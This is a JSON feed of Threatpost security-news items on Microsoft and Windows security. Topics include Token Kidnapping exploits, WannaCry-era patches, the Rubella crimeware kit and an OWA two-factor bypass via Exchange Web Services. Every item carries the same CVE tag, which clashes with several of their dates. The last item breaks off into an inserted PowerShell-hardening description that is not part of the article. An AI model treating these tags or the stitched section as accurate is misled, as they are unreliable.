\n\nCerrudo said the vulnerabilities can be exploited to bypass the new Windows services protections, which helps in post-exploitation scenarios as well, where an attacker is able to run code after exploiting a vulnerability in a Windows service but is not able to compromise the whole system because of these protections.\n\nOne of the issues Cerrudo plans to present at Black Hat even allows him to bypass one of Microsoft\u2019s fixes for previous Token Kidnapping vulnerabilities on Windows 2003.\n\n\u201cMicrosoft is aware of these issues (and other local privilege elevation issue that can be exploited by any user but I won\u2019t be talking about it before the fix) and they will be releasing fixes and advisories in August,\u201d Cerrudo explained.\n\nThe researcher also plans to release two exploits (called Chimichurri and Churraskito) for IIS and SQL Server. These exploits could work on other services too with some minor modifications, he said.\n\n\u201cThe presentation is not only about the vulnerabilities and the exploits. 
I will be showing step by step how I found the vulnerabilities, with what tools and techniques, so participants can learn and walk away knowing how to find these kinds of vulnerabilities by themselves,\u201d Cerrudo added.\n", "cvss3": {}, "published": "2010-07-16T15:42:06", "type": "threatpost", "title": "MS Windows Token Kidnapping Problems Resurface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:32", "id": "THREATPOST:DC3489917B7B9C6C1824FB61C05E82CD", "href": "https://threatpost.com/ms-windows-token-kidnapping-problems-resurface-071610/74221/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:38", "description": "[](<https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/>)Dennis Fisher talks with Stephen Toulouse, director of policy and enforcement for Xbox Live at Microsoft, about his years at the Microsoft Security Response Center, the evolution of security at Microsoft and the joy and pain of being the bad guy on Xbox Live.\n\n[(Download)](<https://threatpost.com/files/2013/04/digital_underground_301.mp3>)\n\nSubscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n", "cvss3": {}, "published": "2009-09-10T19:45:50", "type": "threatpost", "title": "Stephen Toulouse on the MSRC, the Evolution of Security at Microsoft and Securing Xbox Live", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:EE14785AC189E016FD2CE51464D3643D", "href": "https://threatpost.com/stephen-toulouse-msrc-evolution-security-microsoft-and-securing-xbox-live-091009/73017/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Fearing destructive attacks precipitated by the availability of the nation-state exploits in the wild that spawned the WannaCry outbreak, Microsoft today announced that its Patch Tuesday updates would include fixes for older versions of Windows, including XP.\n\nThe move is unusual and mimics a similar one made in the hours following WannaCry\u2019s appearance on May 12 when hundreds of thousands of Windows machines worldwide were compromised and their data encrypted.\n\nMicrosoft had pleaded with Windows admins to apply MS17-010, a security bulletin released in March, one month before the ShadowBrokers leaked a cadre of weaponized Windows exploits, but many did not take heed. Microsoft had to scramble as WannaCry made its way around the globe to release an [emergency update](<https://threatpost.com/microsoft-releases-xp-patch-for-wannacry-ransomware/125671/>) late in the evening of May 12 for Windows XP and Windows 8 machines, easing any potential pain for unsupported versions of Windows; EternalBlue, the NSA exploit in question, targeted SMB running on Windows XP and Windows 7 computers.\n\n\u201cDue to the elevated risk for destructive cyber attacks at this time, we made the decision to take this action because applying these updates provides further protection against potential attacks with characteristics similar to WannaCrypt,\u201d said Adrienne Hall, general manager of Microsoft\u2019s Cyber Defense Operations Center.\n\n\u201cIn reviewing the updates for this month, some vulnerabilities were identified that pose elevated risk of cyber attacks by government organizations, sometimes referred to as nation-state actors or other copycat organizations,\u201d Hall said. \u201cTo address this risk, today we are providing additional security updates along with our regular Update Tuesday service. 
These security updates are being made available to _all_ customers, including those using older versions of Windows.\u201d\n\nMicrosoft said that customers with automatic updates enabled are protected and would not have to take additional action to receive these updates. Microsoft said this is a rare decision and encouraged admins to apply the critical updates.\n\n\u201cOur decision today to release these security updates for platforms not in extended support should not be viewed as a departure from our standard servicing policies,\u201d said Eric Doerr, general manager of the Microsoft Security Response Center. \u201cBased on an assessment of the current threat landscape by our security engineers, we made the decision to make updates available more broadly.\u201d\n\nSince WannaCry, security experts have been warning Windows admins about the ferocity of the EternalBlue exploit and that it could be loaded with [any sort of payload](<https://threatpost.com/next-nsa-exploit-payload-could-be-much-worse-than-wannacry/125743/>), including wiper malware, banking Trojans, or more ransomware. Attackers have already on two occasions used it to spread cryptocurrency mining utilities.\n\nIt\u2019s unknown whether Microsoft was given any advance warning of another upcoming leak or if there are rumblings of another WannaCry-style attack. The ShadowBrokers promised monthly leaks of anything from Windows 10 exploits to mobile attacks to stolen nuclear and missile data in a new subscription service it promised to start next month.\n\nMicrosoft also maintained that organizations should long ago have moved away from older, unsupported platforms such as XP. Windows 10, for example, contains many new mitigations that prevent exploits such as EternalBlue from successfully compromising computers. 
Opponents of today\u2019s move\u2014and of the May 12 emergency update\u2014contend that these concessions on Microsoft\u2019s part to provide these types of updates will allow organizations to rationalize staying on unsupported versions of Windows.\n", "cvss3": {}, "published": "2017-06-13T15:34:53", "type": "threatpost", "title": "Risk of 'Destructive Cyber Attacks' Prompts Microsoft to Update XP Again", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-13T19:35:24", "id": "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "href": "https://threatpost.com/risk-of-destructive-cyber-attacks-prompts-microsoft-to-update-xp-again/126235/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:35", "description": "Microsoft is no exception when it comes to [large technology providers committing to encrypting](<http://threatpost.com/yahoo-encrypts-data-center-links-boosts-other-services/105228>) the services its users depend on.\n\nToday, the company [announced](<http://blogs.technet.com/b/microsoft_on_the_issues/archive/2014/06/30/advancing-our-encryption-and-transparency-efforts.aspx>) an update on the progress it has made in engineering those changes, including the news that Outlook.com, its web-based email service, supports TLS encryption inbound and outbound as well as Perfect Forward Secrecy.\n\n\u201cOur goal is to provide even greater protection for data across all the great Microsoft services you use and depend on every day,\u201d said Matt Thomlinson, vice president Trustworthy Computing. \u201cThis effort also helps us reinforce that governments use appropriate legal processes, not technical brute force, if they want access to that data.\u201d\n\nMicrosoft also announced that its OneDrive cloud-based storage service has enabled Perfect Forward Secrecy. 
The technology keeps data safe by randomizing private encryption keys used to secure communication; if a key is compromised, it cannot be used to decrypt other messages at a future time.\n\nIn the year-plus since the Snowden revelations began and [technology companies were questioned about the level of their complicity](<http://threatpost.com/tech-giants-update-transparency-reports-with-fisa-request-numbers/104056>) with government surveillance, firms such as Microsoft, Google, Facebook and Yahoo have taken public stands about the security of their services.\n\nDevelopers are being encouraged to use encryption and security technologies such as HTTPS, HSTS and PFS as default starting points in new applications. In December, Microsoft said it would have encryption protecting its services by the end of this year, including supporting HSTS on its public-facing services that exchange data, including email and credentials. Microsoft said it would also roll out STARTTLS for Outlook.com.\n\nHSTS, or [HTTPS Strict Transport Protocol](<http://threatpost.com/ie-12-to-support-hsts-encryption-protocol/105266>), forces sessions sent over HTTP to be sent instead over HTTPS. [STARTTLS](<http://threatpost.com/smtp-starttls-deployments-better-than-expected-facebook-says/106054>), meanwhile, allows clients and servers to encrypt messages provided both ends of a conversation support the protocol.\n\n[Microsoft\u2019s December promise](<http://blogs.technet.com/b/microsoft_blog/archive/2013/12/04/protecting-customer-data-from-government-snooping.aspx?Redirected=true>), meanwhile, is coming to fruition. It promised then that customer data moving between the user and Microsoft would be encrypted by default and that data moving between data centers would be encrypted too. 
Microsoft has already moved to deprecate weak encryption keys, supporting only a minimum 2048-bit key length.\n\nMicrosoft chose email as a starting point to concentrate its encryption efforts, bringing in worldwide partners such as Deutsche Telekom, Yandex and Mail.ru to test the viability of its encryption. The addition of Perfect Forward Secrecy to Outlook and OneDrive, for example, puts up another barrier not only for government intelligence agencies, but for criminal hackers as well.\n\n\u201cForward secrecy uses a different encryption key for every connection, making it more difficult for attackers to decrypt connections,\u201d Thomlinson said, adding that OneDrive customers get PFS whether accessing the service online, through its mobile application or a sync client. \u201cAs with Outlook.com\u2019s email transfer, this makes it more difficult for attackers to decrypt connections between their systems and OneDrive.\u201d\n\nMicrosoft also announced it has opened its first Microsoft Transparency Center. Located on the Redmond campus, the center provides participating governments with a place to review source code for a number of products and certify the integrity of the source code. Other such centers are in the works, Thomlinson said, including one in Brussels, Belgium, announced in January.\n\n\u201cAs with most things relating to security, the landscape is ever changing,\u201d he said. 
\u201cOur work is ongoing and we are continuing to advance on engineering and policy commitments with the goal of increasing protection for your data and increasing transparency in our processes.\u201d\n", "cvss3": {}, "published": "2014-07-01T14:42:05", "type": "threatpost", "title": "Microsoft Expands TLS, Forward Secrecy Support", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-07-01T18:42:05", "id": "THREATPOST:F514D796FE42C0629BD951D8664A2420", "href": "https://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:36", "description": "Dennis Fisher talks with Ryan Naraine about the new Microsoft bug bounty program, how it may affect prices for vulnerabilities on the private market and why it took the company so long to start the reward program.\n\n<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>\n\nDownload: [digital_underground_116](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044126/digital_underground_116.mp3>)[ \n](<https://media.threatpost.com/wp-content/uploads/sites/103/2013/06/07044809/digital_underground_116.mp3>)\n", "cvss3": {}, "published": "2013-06-21T09:49:19", "type": "threatpost", "title": "Ryan Naraine on Microsoft's New Bug Bounty Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-16T20:41:20", "id": "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "href": "https://threatpost.com/ryan-naraine-on-microsofts-bug-bounty-program/101053/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:19", "description": "About a decade ago, many large software makers learned some very difficult lessons about software security and building security into their products 
from the start. Some are still learning. The FTC and a variety of security experts are hoping that today\u2019s crop of start-ups will not have to go through that same painful process.\n\nThe FTC is launching a new initiative aimed at start-ups, called [Start With Security](<https://www.ftc.gov/tips-advice/business-center/guidance/start-security-guide-business>), that\u2019s designed to help smaller companies build security into not just their products, but also into their cultures. One of the thrusts of that effort is encouraging companies to begin thinking about the security of their products from the very beginning of the design and development process. This is something that vendors such as Microsoft, Adobe, and many others have been doing for some time.\n\nBut that\u2019s not always because someone inside the company just thought it was a keen idea. In most cases, the changes the software makers made were in response to repeated public attacks on their products and pressure from customers for change. Microsoft is the perfect example. Following a series of major worms that exploited bugs in their products, the company did an about-face on security.\n\n[Window Snyder](<https://threatpost.com/how-i-got-here-window-snyder/114524/>), who was in the security group at Microsoft at the time, said during a panel at an [event](<https://www.ftc.gov/news-events/events-calendar/2015/09/start-security-san-francisco>) sponsored by the FTC in San Francisco Wednesday that the change was an incredibly difficult one for the company.\n\n\u201cThe real motivator for change at Microsoft was a tremendous amount of pain. You guys don\u2019t have to go that route,\u201d said Snyder, who is now the CSO at Fastly.\n\n\u201cThe cost to Microsoft to make those kinds of changes was tremendous. It was a huge challenge for them to try and turn the ship at that point. That was a huge cost and you don\u2019t want to do it at the end, you want to do it at the beginning. 
That\u2019s the time to think about security.\u201d\n\nNot only is the process simpler when you start thinking about security early, it\u2019s far less expensive, the panelists said.\n\n\u201cSecurity is much, much, much cheaper the earlier you do it,\u201d said Devdatta Akhawe, a security engineer at Dropbox. \u201cEither you can plan for security early on and be happy later, or keep fighting and have an expensive battle later on.\u201d\n\nThis is a message that software security experts and many others have been trying to convey to developers and design teams for a long time, with varying levels of success. Many large enterprises, not just commercial software vendors, have adopted secure coding and threat modeling practices and become involved in projects such as [BSIMM](<https://www.bsimm.com>), a software security maturity model.\n\nBut getting the security message across to non-security people can be a difficult process. Frank Kim, CISO of The SANS Institute, said making the risks and rewards real for people is an important aspect of the effort.\n\n\u201cYou have to focus on telling stories. You can\u2019t just go and say, There\u2019s a vulnerability in this line of code and you\u2019re a terrible person,\u201d Kim said. \u201cWe make it tangible and concrete by telling stories about what can happen to your application as a result of that vulnerability.\u201d\n\nThe seriousness of the security problem is not lost on officials at the top of the FTC, which is responsible for investigating and punishing companies that fail to live up to security and privacy standards.\n\n\u201cIn a world where everything is connected, insecure products and services can have severe consequences. 
It\u2019s never been more clear that we must secure the software supporting our digital lives,\u201d FTC Chairwoman Edith Ramirez said in her opening remarks at the event.\n", "cvss3": {}, "published": "2015-09-09T15:03:39", "type": "threatpost", "title": "FTC, Experts Push Startups to Think About Security From the Beginning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-09-09T19:03:39", "id": "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "href": "https://threatpost.com/ftc-experts-push-startups-to-think-about-security-from-the-beginning/114612/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "\n\nScott Charney used his keynote speech at the RSA Conference on Tuesday to talk up a variety of hardware and software-based technologies meant to infuse the Internet with more trust. Charney, the head of Microsoft\u2019s Trustworthy Computing team, talked about the need for greater adoption of TPMs, code signing and identity systems, all of which the company has been discussing in various forms for the better part of a decade.\n\nMany of the technologies that Charney discussed, including the TPM and code signing, were part of the company\u2019s much-maligned and controversial Palladium project. Some of the technologies have been implemented in various forms in Vista and others are still forthcoming. But Charney said Tuesday that many of the problems that plague the Internet could be addressed with better trust on the part of users, machines, vendors and other parties.\n\n\u201cWe need alignment between political, economic and social forces and IT,\u201d he said. 
\u201cWe need trusted people, we need to know who we\u2019re dealing with online.\u201d\n\nMany of the machines that now run Vista include a TPM, which is a hardware module used to attest to the identity of the machine, as well as serve as a sealed storage area for cryptographic keys. \u201cWe have to root trust in the hardware because it\u2019s less malleable than software,\u201d Charney said.\n\nMicrosoft also is working on some new technologies, including the [Geneva server](<http://msdn.microsoft.com/en-us/security/aa570351.aspx>) which handles identity in a claims-based manner, Charney said. \u201cThis identity metasystem is the most controversial part because of privacy concerns,\u201d he said.\n", "cvss3": {}, "published": "2009-04-21T18:54:59", "type": "threatpost", "title": "Charney plugs Microsoft end-to-end trust at RSA Conference", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "href": "https://threatpost.com/charney-plugs-microsoft-end-end-trust-rsa-conference-042109/72565/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:49", "description": "[From Washington Post (Brian Krebs)](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>)\n\n[](<https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/>)Microsoft may soon be taking the unusual step of issuing an out-of-band security update to address multiple weaknesses that stem from a Windows security flaw that the software giant tried to fix earlier this month. 
[Read the full story](<http://voices.washingtonpost.com/securityfix/2009/07/msft_scrambling_to_close_stubb.html>) [washingtonpost.com] See more details [at Halvar Flake\u2019s blog](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>) [blogspot.com]\n", "cvss3": {}, "published": "2009-07-24T14:02:10", "type": "threatpost", "title": "Microsoft Scrambling to Close Stubborn Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:56", "id": "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "href": "https://threatpost.com/microsoft-scrambling-close-stubborn-security-hole-072409/72881/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:10", "description": "\n\nMicrosoft has developed an ultra-secure version of Windows XP, with many settings locked down by default. But the hardened OS isn\u2019t for sale to the general public; it\u2019s made specifically for the military. Microsoft built the secure version of XP a few years ago at the direction of the Air Force, which had grown weary of the constant updates to other Windows versions and had just seen its network defenses abused in a penetration test by the National Security Agency.\n\nIn response, the Air Force went to Microsoft and leaned on the software giant to put together a hardened version of XP, built to the service\u2019s specifications. As Wired.com\u2019s [Threat Level](<http://www.wired.com/threatlevel/2009/04/air-force-windows/>) reports:\n\nThe Air Force persuaded Microsoft CEO Steve Ballmer to provide it with a secure Windows configuration that saved the service about $100 million in contract costs and countless hours of maintenance. 
At a congressional hearing this week on cybersecurity, Alan Paller, research director of the Sans Institute, shared the story as a template for how the government could use its massive purchasing power to get companies to produce more secure products. And those could eventually be available to the rest of us.\n\nSecurity experts have been arguing for this \u201ctrickle-down\u201d model for years. But rather than wield its buying power for the greater good, the government has long wimped out and taken whatever vendors served them. If the Air Force case is a good judge, however, things might be changing.\n\nVarious government agencies have in fact tried this tactic before, with various levels of success. The [Department of Energy signed a contract with Oracle](<http://www.nytimes.com/2003/09/24/business/technology-briefing-software-oracle-and-energy-dept-increase-software-security.html?n=Top/News/Business/Companies/Oracle%20Corporation>) in 2003 that specified various minimum security settings in the company\u2019s products. Little has been heard of this effort since then, however.\n\nWhile this version was built to the Air Force\u2019s specifications, both home users and IT shops can benefit from the work by applying the [secure configuration settings for Windows XP](<http://csrc.nist.gov/itsec/guidance_WinXP.html>) published by the National Institute of Standards and Technology. 
The guidelines are step-by-step walkthroughs for locking down machines running XP, and there are similar guides for Windows Vista and other products on the NIST site.\n", "cvss3": {}, "published": "2009-05-01T14:37:52", "type": "threatpost", "title": "Microsoft develops secure Windows XP for military", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:05", "id": "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "href": "https://threatpost.com/microsoft-develops-secure-windows-xp-military-050109/72775/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:33", "description": "[](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/>)LAS VEGAS\u2013Microsoft on Thursday handed out three rather large checks to a trio of security researchers, the largest one\u2013$200,000\u2013going to Vasillis Pappas who won the company\u2019s first [Blue Hat Prize](<https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/>) competition for defensive technologies. Pappas\u2019s kBouncer ROP mitigation technology edged out ROP-related submissions from the two other finalists, and will be integrated by Microsoft in the near future.\n\nThe company announced Pappas as the winner of the contest at its annual party at the end of the Black Hat conference here with a splashy American Idol-style reveal, complete with blaring music and a massive confetti shower. Pappas, a PhD candidate at Columbia University, has been focused on the research for his submission for more than a year. 
His kBouncer technology uses the kernel to enforce restrictions about what processes can do, and prevents anything that looks like return-oriented programming from running.\n\nIn addition to the $200,000 that Pappas won, Ivan Fratric was awarded $50,000 for his ROPGuard technology and Jared DeMott won $10,000 and an MSDN subscription for his /ROP submission. Microsoft officials said they were quite happy with the quality of the submissions for the contest and accomplished their stated goal of identifying innovative defensive technologies.\n\n\u201cRunning the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve,\u201d [Katie Moussouris of Microsoft](<https://blogs.technet.com/b/ecostrat/archive/2012/07/26/the-bluehat-prize-v1-0-and-the-winners-are.aspx?Redirected=true>) said in a blog post on the contest.\n\nMicrosoft officials have said repeatedly in the last few years that the company does not plan to offer bug bounties to security researchers who discover vulnerabilities in Microsoft products. Google, Mozilla and several other companies have such programs, and the Blue Hat prize was Microsoft\u2019s way of responding and attempting to focus the energy of researchers on defensive technologies instead of finding bugs.\n\n\u201cOne thing is certain \u2013 we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. 
To address the security threats of today and tomorrow, we as an industry need to appreciate both,\u201d Moussouris said.\n\n \n\n", "cvss3": {}, "published": "2012-07-27T13:57:41", "type": "threatpost", "title": "Vasillis Pappas Wins $200,000 Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:44C93D75841336281571380C5E523A23", "href": "https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/76857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:07", "description": "A crimeware kit dubbed the Rubella Macro Builder is betting on a \u201cdirty deeds done dirt cheap\u201d approach to gain popularity in the criminal underground. The kit does two things: with a point-and-click builder functionality, it generates an initial malware payload for social-engineering spam campaigns; and it only costs $40 per month.\n\nRubella is not particularly high-achieving: It eschews the [exploitation of vulnerabilities](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) for social-engineering techniques; users use it to take the well-worn route of sending out mail with Microsoft Word or Excel email attachments (with the goal of getting victims to enable malicious macros). It\u2019s not very aspirational either: Its humble intent involves generating fairly simple first-stage loader malware that threat actors can use for subsequent downloads and installations on targeted machines.\n\nHowever, the price is right, and it\u2019s got some attractive bells and whistles. 
A three-month license includes various encryption algorithm choices (XOR and Base64), download methods (PowerShell, Bitsadmin, Microsoft.XMLHTTP, MSXML2.XMLHTTP or a custom PowerShell payload), payload execution methods (executable, JavaScript, Visual Basic Script), and the ability to easily deploy social-engineering decoy themes.\n\n\u201cDespite being relatively new and unsophisticated, the kit has a clear appeal for cybercriminals: it\u2019s cheap, fast and can defeat basic static antivirus detection,\u201d said Flashpoint researchers, [in a blog](<https://www.flashpoint-intel.com/blog/rubella-macro-builder/>).\n\nCheap and easy: That phrase is music to criminals\u2019 ears everywhere, and no less so in the cyberworld. And indeed it\u2019s gaining traction: Flashpoint analysts determined that the criminal gangs behind the Panda and Gootkit banking malware each leveraged the Rubella first-stage loader as an initial attack vector in two recent but separate campaigns.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/26145144/Rubella.png>)\n\n\u201cIt is likely that the gangs are customers of the actor offering Rubella on the underground,\u201d the researchers said. \u201cSpecifically, the gangs behind the Panda malware distribution appear to have targeted customers through various social-media platforms, as well as an Australian financial institution through Panda\u2019s web-inject functionality.\u201d\n\nThe macro junk and substitution method appears to be relatively primitive, relying on basic string substitutions. Additionally, its copy/paste implementation of the Base64 algorithm is displayed in Visual Basic Script (VBS) code implementation. The code is obfuscated through general Chr ASCII values. But it lives squarely in the sweet spot for most financially motivated criminals, whose model relies on maximizing margins and volume. 
And the infection tactics, though arguably pedestrian, work.\n\n\u201cMicrosoft Office macro-based malware appears to still be threat actors\u2019 preferred method for obtaining initial access to compromised machines,\u201d Flashpoint researchers said. \u201cSuch Microsoft Office-based loader malware works well as an initial decoy\u2014disguising itself as a commonly exchanged Word or Excel document and impersonating normal Microsoft Office or Excel attachments\u2014and is generally spread via email attacks. While relatively unsophisticated, the Rubella Macro Builder represents a moderate threat to various networks.\u201d\n", "cvss3": {}, "published": "2018-04-26T19:33:48", "type": "threatpost", "title": "Rubella Crimeware Kit: Cheap, Easy and Gaining Traction", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-04-26T19:33:48", "id": "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "href": "https://threatpost.com/rubella-crimeware-kit-cheap-easy-and-gaining-traction/131474/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:30", "description": "Enterprises running Exchange Server have been operating under a false sense of security with regard to two-factor authentication implementations on Outlook Web Access (OWA) adding an extra layer of protection.\n\nA design weakness has been exposed that can allow an attacker to easily bypass 2FA and access an organization\u2019s email inboxes, calendars, contacts and more.\n\nThe problem lies in the fact that Exchange Server also exposes the Exchange Web Services (EWS) interface alongside OWA and it is [not covered by two-factor authentication](<http://www.blackhillsinfosec.com/?p=5396>). 
EWS is enabled by default and shares the same port and server as OWA, meaning an attacker with [stolen] credentials can remotely access EWS, which talks to the same backend infrastructure as OWA, and would gain access to a user\u2019s inbox.\n\nThe issue was publicly disclosed on Wednesday by researcher Beau Bullock of Black Hills Information Security, a consultancy based in South Dakota. Bullock privately disclosed his findings to Microsoft on Sept. 28, and after an initial acknowledgement, repeated follow-up emails failed to produce a patch or mitigation. Bullock went public yesterday, but shortly thereafter, Microsoft contacted him with a mitigation that would likely break some services that rely on Exchange Web Services, such as thick clients like Outlook for Mac.\n\nBullock told Threatpost that it\u2019s likely Microsoft cannot fix this without re-architecting some parts of the affected infrastructure.\n\n\u201cThe biggest thing is that Outlook Web Access is on the same webserver as Exchange Web Services and they\u2019re both enabled by default. I think the biggest problem is that most people don\u2019t seem to understand that\u2019s the thing that\u2019s happening,\u201d Bullock said. \u201cA lot of people think they have this Exchange server on the Internet and they have it there just for OWA, but the biggest problem is they don\u2019t understand EWS is enabled by default as well. The fix is more widespread awareness that it\u2019s actually there.\u201d\n\nBullock, a penetration tester, believes that there isn\u2019t a lot of awareness that this configuration exists and that organizations aren\u2019t aware that this second protocol is running alongside OWA and is not covered by 2FA.\n\n\u201cThat\u2019s not inherently clear in the documentation that if you enable two-factor authentication on OWA, you have to be careful that you have this other protocol right here that is still only single factor,\u201d Bullock said. 
\u201cIt talks to same backend infrastructure.\u201d\n\nBullock pointed out that it\u2019s not unusual to have different protocols, such as RDP and SMB, running on the same server where, for example, RDP is covered by two-factor authentication and SMB is not. The two services, however, are not running on the same port, and Bullock points out that an enterprise could create firewall rules to curtail access.\n\n\u201cThat\u2019s why this is more of a serious issue,\u201d Bullock explained. \u201cWhen you expose a server externally, you allow access only to that port. If you don\u2019t know a completely separate protocol is operating on same port, you\u2019re potentially opening up another way to communicate to that infrastructure.\u201d\n\nBullock described in a report published yesterday how he carried out the attack against OWA protected by Duo for Outlook 2FA. \nBy targeting EWS with his test account\u2019s credentials and a pen-testing tool called MailSniper, which connects to Exchange and searches an inbox for sensitive data, Bullock was able to bypass the 2FA protecting OWA. An attacker in a real-world scenario could gain access to a user\u2019s credentials, for example, from any of the tens of millions of credentials dumped online this summer.\n\nTo confirm that this wasn\u2019t an issue with Duo for Outlook, Bullock ran a similar test against Office 365 with Microsoft Azure Multifactor Authentication enabled. Using the same attack, he was able to bypass that 2FA as well, Bullock said.\n\n\u201cThis does not affect Office 365 with multi-factor authentication (MFA) fully enabled. What the blog describes is not a software vulnerability and does not work without user account credentials/stolen passwords,\u201d a Microsoft spokesperson told Threatpost.\n\n\u201cI think in the end, the best solution would be to re-architect it,\u201d Bullock said. 
\u201cIn the short term, how hard would it be for Microsoft to disable it by default and if an organization actually needed to use EWS for a thick client, then they could enable it. They\u2019re trying to keep all the protocols open and make it easier for deployment.\u201d\n", "cvss3": {}, "published": "2016-11-03T15:15:56", "type": "threatpost", "title": "Outlook Web Access Two-Factor Authentication Bypass Exists", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-03T19:15:56", "id": "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "href": "https://threatpost.com/outlook-web-access-two-factor-authentication-bypass-exists/121777/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:32", "description": "Microsoft gave its users steps earlier this week to sidestep a vulnerability in one of Oracle\u2019s Outside In libraries. The company published some mitigations for the bug, but said it isn\u2019t aware of any active attacks against it yet.\n\nThe Oracle technology is licensed by software developers like Microsoft to transform and control different types of file formats. Outside In is present in Microsoft\u2019s Exchange Server 2007, Exchange Server 2010 and FAST Search Server for Sharepoint products. 
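Returning to the EWS exposure described in the OWA item above before the Outside In workaround continues: the PowerShell below is an added example, not code from the Threatpost article, from Bullock's report or from MailSniper. The first function, run from any workstation, asks a placeholder host (mail.example.com, an assumption) for /owa/ and /EWS/Exchange.asmx and reports whether EWS answers with a password-only authentication challenge on the same HTTPS listener OWA uses. The remaining functions are for the Exchange Management Shell of an on-premises server (Exchange 2010 or later is assumed, since that is where the EWS allow-list settings appeared): they show the OWA and EWS virtual directories side by side, list mailboxes that can still authenticate over EWS, and restrict or disable it. Written for Windows PowerShell 5.1, whose Invoke-WebRequest raises System.Net.WebException on a 401; the user-agent strings in Set-EwsAllowList are sample values, not a verified list.

```powershell
# Added example (not from the Threatpost article, Bullock's report or MailSniper).
# Part 1 runs from any workstation; part 2 requires the Exchange Management Shell
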